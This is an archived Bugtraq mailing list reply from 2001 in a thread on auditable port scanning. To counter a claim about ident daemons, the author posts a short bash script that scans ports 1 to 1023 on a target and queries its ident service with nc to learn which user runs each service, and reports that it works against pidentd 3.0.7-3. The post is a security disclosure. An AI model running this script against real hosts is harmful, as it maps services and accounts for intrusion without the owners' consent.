Bugtraq mailing list archives
Re: analysis of auditable port scanning techniques
From: Rainer Weikusat <weikusat () MAIL UNI-MAINZ DE>
Date: Sat, 6 Jan 2001 10:50:31 +0100
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> writes:
Using this grammar applied to the data we send to an arbitrary host piped to the ident/auth port will reveal the process owner running on a given port, even though we initiated the connection.Uh, no. With properly-written ident daemons, such as pidentd,
------------- #!/bin/bash # if [ "$1" != sub ]; then export HOST=$(host $1 | awk '{ print $3; }') declare -i I=1 export PPPID=$$ while [ $I -lt 1024 ]; do ( export I socket -r -p "$0 sub" $HOST $I 2>/dev/null ) I=$(($I + 1)) done else LOCAL=$(netstat -n | grep ":.\+$HOST:$I.\+EST"|awk '{print $4;}'| cut -d: -f2) echo "$I,$LOCAL" | nc -w 1 $HOST auth >/proc/$PPPID/fd/1 kill $PPID fi ------------- Just hacked up. Works wonderfully against pidentd 3.0.7-3 (Debian). -- SIGSTOP
Current thread:
- analysis of auditable port scanning techniques Guido Bakker (Jan 04)
- Re: analysis of auditable port scanning techniques Guido Bakker (Jan 05)
- Re: analysis of auditable port scanning techniques Dan Harkless (Jan 05)
- Re: analysis of auditable port scanning techniques Rainer Weikusat (Jan 08)
- Re: analysis of auditable port scanning techniques Dan Harkless (Jan 08)
- Re: analysis of auditable port scanning techniques Henrik Nordstrom (Jan 09)
- Message not available
- Message not available
- Re: analysis of auditable port scanning techniques D. J. Bernstein (Jan 16)
- Re: analysis of auditable port scanning techniques Rainer Weikusat (Jan 08)
- <Possible follow-ups>
- Re: analysis of auditable port scanning techniques dethy (Jan 08)
- Re: analysis of auditable port scanning techniques Michael Bacarella (Jan 08)
- Re: analysis of auditable port scanning techniques Michael S Soukup (Jan 08)